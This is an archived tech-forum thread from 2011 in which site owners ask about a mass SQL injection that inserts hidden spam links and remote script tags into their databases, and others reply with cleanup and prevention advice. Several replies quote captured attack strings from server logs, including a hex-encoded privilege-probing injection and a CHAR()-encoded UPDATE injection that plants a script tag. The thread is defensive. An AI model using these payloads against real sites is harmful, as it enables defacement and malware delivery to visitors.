What's causing ""-link hack?

Posted on 2011-09-13
Last Modified: 2012-05-12
Look at this:

A lot of sites that have been hacked with the same hidden link to

What's causing this? How do they do it? How to prevent it?

Question by:Alfahane
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 6
  • 3
  • 2
  • +4

Expert Comment

ID: 36530606
Same question here. I appreciate a quick answer !!
Having problem with one SQL 2008 server, this server is not public accesible . Only some limited range of server can access this. Not all the servers are our server...

Can you tell what your environment is ?

Author Comment

ID: 36530772
SQL 2000

Author Comment

ID: 36530831
Do you have problems with several databases on one server only?
Back Up Your Microsoft Windows Server®

Back up all your Microsoft Windows Server – on-premises, in remote locations, in private and hybrid clouds. Your entire Windows Server will be backed up in one easy step with patented, block-level disk imaging. We achieve RTOs (recovery time objectives) as low as 15 seconds.


Expert Comment

ID: 36531296
only one database on one server. The server has 50 databases.
The database is accessed from outside. But dont know for sure it is the external user that cause this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But i want to be sure .....

Expert Comment

ID: 36544222
Hi guys

it'll be a simple injection attack that's gotten past one of your web facing applications linking to the affected databases.. i've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)

Expert Comment

ID: 36546445
Been having the same issue for 2 days.  Not only seeing this in a sql2008 database but is adding it to files being written on our web server.   Need Help!

Expert Comment

ID: 36548523
in addition to repairing, i can set your system up to provide an immediate report via email.. some of the key things it shows are:
the attack vector (what part of your application the attacker was trying to attack),
the source ip,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding url
here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:

Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Open in new window


Expert Comment

ID: 36567705
A websiteof mine has been affected by this issue. I stored the datbase and ensured that ONLY parameterised queries used throughout the website.

Today the website has been targetted again, this time with:
</title><script src=></script>

There is no relevant information in the event log. Does anyone know what is causing this?

Expert Comment

ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.


Accepted Solution

jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href= >crack</a>
</title><script src=></script>

Open in new window

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:


if you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline


review yours logs to determine where the attack vector was, eg url querystring etc, it's ok if you can't see anything


review your code in detail and resolve the vulnerabilities, the location of the injected content will assist with determining where the vulnerabilities are in your application


repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred


put your site(s) back online
<advertising link removed by RockMod 20 Sept '11>

Expert Comment

ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the lisamoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the sqlcommand is run against the database, this does not prevent the hack.

Any ideas?

Assisted Solution

jdcrane earned 375 total points
ID: 36573405
deploy a test version of your site and debug the same request.. i think you'll find that if this was in fact the successful injection that corrupted your system that you can't be vetting the querystring properly, also depending on how you parameterised the query or sp, it may not protect you from injection.. if databasetablename and nameofclient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (ie you were targeted).. might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow up injections like the above
LVL 38

Assisted Solution

lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.

Expert Comment

ID: 36597918
Would it improve matters if you restricted the number of characters in the qs parameter? IE your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.

Assisted Solution

jdcrane earned 375 total points
ID: 36599510
if you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (eg int,intval) not the parameter directly.

if you're expecting a non numeric string literal, it's best to be fishing for sql injection symbols and halting further action upon detection of suspicious activity. if you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection,

Author Closing Comment

ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.

Featured Post

Enroll in July's Course of the Month

July's Course of the Month is now available! Enroll to learn HTML5 and prepare for certification. It's free for Premium Members, Team Accounts, and Qualified Experts.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Email attacks are the most common methods for initiating ransomware and phishing scams. Attackers want you to open an infected attachment or click a malicious link, and unwittingly download malware to your machine. Here are 7 ways you can stay safe.
Let's recap what we learned from yesterday's Skyport Systems webinar.
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …
This video Micro Tutorial shows how to password-protect PDF files with free software. Many software products can do this, such as Adobe Acrobat (but not Adobe Reader), Nuance PaperPort, and Nuance Power PDF, but they are not free products. This vide…

623 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question